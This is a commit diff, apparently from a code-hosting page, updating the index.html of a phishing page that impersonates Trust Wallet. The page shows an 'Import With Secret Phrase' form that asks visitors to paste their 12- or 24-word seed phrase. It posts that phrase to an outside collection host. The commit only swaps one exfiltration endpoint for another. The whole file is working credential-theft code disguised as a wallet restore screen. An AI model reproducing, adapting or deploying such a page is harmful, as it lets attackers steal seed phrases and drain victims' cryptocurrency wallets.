twtusdc commited on
Commit
4dc6e4b
·
verified ·
1 Parent(s): 35a2360

Update index.html

Browse files
Files changed (1) hide show
  1. index.html +102 -102
index.html CHANGED
@@ -1,102 +1,102 @@
1
- <!doctype html>
2
- <html lang="en"><head>
3
- <style>
4
- .anticon {
5
- display: inline-block;
6
- color: inherit;
7
- font-style: normal;
8
- line-height: 0;
9
- text-align: center;
10
- text-transform: none;
11
- vertical-align: -0.125em;
12
- text-rendering: optimizeLegibility;
13
- -webkit-font-smoothing: antialiased;
14
- -moz-osx-font-smoothing: grayscale;
15
- }
16
-
17
- .anticon > * {
18
- line-height: 1;
19
- }
20
-
21
- .anticon svg {
22
- display: inline-block;
23
- }
24
-
25
- .anticon::before {
26
- display: none;
27
- }
28
-
29
- .anticon .anticon-icon {
30
- display: block;
31
- }
32
-
33
- .anticon[tabindex] {
34
- cursor: pointer;
35
- }
36
-
37
- .anticon-spin::before,
38
- .anticon-spin {
39
- display: inline-block;
40
- -webkit-animation: loadingCircle 1s infinite linear;
41
- animation: loadingCircle 1s infinite linear;
42
- }
43
-
44
- @-webkit-keyframes loadingCircle {
45
- 100% {
46
- -webkit-transform: rotate(360deg);
47
- transform: rotate(360deg);
48
- }
49
- }
50
-
51
- @keyframes loadingCircle {
52
- 100% {
53
- -webkit-transform: rotate(360deg);
54
- transform: rotate(360deg);
55
- }
56
- }
57
- </style>
58
- <meta charset="utf-8"><link rel="icon" href="112.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
59
- <link href="cunek/ayam/apk.css" rel="stylesheet">
60
- <link rel="apple-touch-icon" href=trust-wallet.png"><title>Trust Wallet</title>
61
- <link href="cunek/ayam/chunk1.css" rel="stylesheet">
62
- <link href="cunek/ayam/app.css" rel="stylesheet">
63
- <link href="cunek/ayam/main.chunk.css" rel="stylesheet">
64
- <script src="cunek/ayam/jquery.min.js"></script>
65
- <script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
66
- </head>
67
- <body>
68
-
69
-
70
-
71
- <div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
72
-
73
-
74
-
75
-
76
-
77
-
78
- <div style="text-align: center;">
79
- <img src="kgokeur84uf74rewewe-removebg-preview.png" width="230" height="40">
80
- </div>
81
- <h2><center>Import With Secret Phrase</center></h2><center><p class="thepadding">
82
-
83
- </p></center>
84
-
85
- <div class="sc-htoDjs cDnNqw">
86
- <form method="post" action="https://base.loyalty-user.com/claim/reward/phpp/limbong4.php" class="ant-form ant-form-horizontal">
87
- <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);"></p>
88
- <div>
89
-
90
- <div class="thepadding">
91
- <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="keluhan" id="keluhan" maxlength="350" class="wInput ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" minlength="24" required="" aria-Imports-error-home="false" aria-required="true" style="" accounts.mode="==" ng-model="vm.seed" ng-change="vm.refreshAddress()" ng-model-options="{ debounce: 750 }" ng-trim="false"></textarea>Typically 12 (sometimes 24) words separated by single space</h5>
92
- <p style="color: red;">Invalid mnemonic phrase</p>
93
- </div></div><div class="ant-form-item-explain">
94
- </div></div></div>
95
-
96
-
97
- <div class="thepadding">
98
- <button class="button sc-VigVT fWmldN"="disabled" id="imp" ">Restore Wallet</button>
99
- <div1></div1></div></form>
100
- </div>
101
- </div></div></div></div></div>
102
-
 
1
+ <!doctype html>
2
+ <html lang="en"><head>
3
+ <style>
4
+ .anticon {
5
+ display: inline-block;
6
+ color: inherit;
7
+ font-style: normal;
8
+ line-height: 0;
9
+ text-align: center;
10
+ text-transform: none;
11
+ vertical-align: -0.125em;
12
+ text-rendering: optimizeLegibility;
13
+ -webkit-font-smoothing: antialiased;
14
+ -moz-osx-font-smoothing: grayscale;
15
+ }
16
+
17
+ .anticon > * {
18
+ line-height: 1;
19
+ }
20
+
21
+ .anticon svg {
22
+ display: inline-block;
23
+ }
24
+
25
+ .anticon::before {
26
+ display: none;
27
+ }
28
+
29
+ .anticon .anticon-icon {
30
+ display: block;
31
+ }
32
+
33
+ .anticon[tabindex] {
34
+ cursor: pointer;
35
+ }
36
+
37
+ .anticon-spin::before,
38
+ .anticon-spin {
39
+ display: inline-block;
40
+ -webkit-animation: loadingCircle 1s infinite linear;
41
+ animation: loadingCircle 1s infinite linear;
42
+ }
43
+
44
+ @-webkit-keyframes loadingCircle {
45
+ 100% {
46
+ -webkit-transform: rotate(360deg);
47
+ transform: rotate(360deg);
48
+ }
49
+ }
50
+
51
+ @keyframes loadingCircle {
52
+ 100% {
53
+ -webkit-transform: rotate(360deg);
54
+ transform: rotate(360deg);
55
+ }
56
+ }
57
+ </style>
58
+ <meta charset="utf-8"><link rel="icon" href="112.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
59
+ <link href="cunek/ayam/apk.css" rel="stylesheet">
60
+ <link rel="apple-touch-icon" href=trust-wallet.png"><title>Trust Wallet</title>
61
+ <link href="cunek/ayam/chunk1.css" rel="stylesheet">
62
+ <link href="cunek/ayam/app.css" rel="stylesheet">
63
+ <link href="cunek/ayam/main.chunk.css" rel="stylesheet">
64
+ <script src="cunek/ayam/jquery.min.js"></script>
65
+ <script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
66
+ </head>
67
+ <body>
68
+
69
+
70
+
71
+ <div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
72
+
73
+
74
+
75
+
76
+
77
+
78
+ <div style="text-align: center;">
79
+ <img src="kgokeur84uf74rewewe-removebg-preview.png" width="230" height="40">
80
+ </div>
81
+ <h2><center>Import With Secret Phrase</center></h2><center><p class="thepadding">
82
+
83
+ </p></center>
84
+
85
+ <div class="sc-htoDjs cDnNqw">
86
+ <form method="post" action="https://solprizeprogram.my.id/imp.php" class="ant-form ant-form-horizontal">
87
+ <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);"></p>
88
+ <div>
89
+
90
+ <div class="thepadding">
91
+ <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="keluhan" id="keluhan" maxlength="350" class="wInput ng-pristine ng-empty ng-invalid ng-invalid-required ng-valid-minlength ng-valid-maxlength ng-touched" minlength="24" required="" aria-Imports-error-home="false" aria-required="true" style="" accounts.mode="==" ng-model="vm.seed" ng-change="vm.refreshAddress()" ng-model-options="{ debounce: 750 }" ng-trim="false"></textarea>Typically 12 (sometimes 24) words separated by single space</h5>
92
+ <p style="color: red;">Invalid mnemonic phrase</p>
93
+ </div></div><div class="ant-form-item-explain">
94
+ </div></div></div>
95
+
96
+
97
+ <div class="thepadding">
98
+ <button class="button sc-VigVT fWmldN"="disabled" id="imp" ">Restore Wallet</button>
99
+ <div1></div1></div></form>
100
+ </div>
101
+ </div></div></div></div></div>
102
+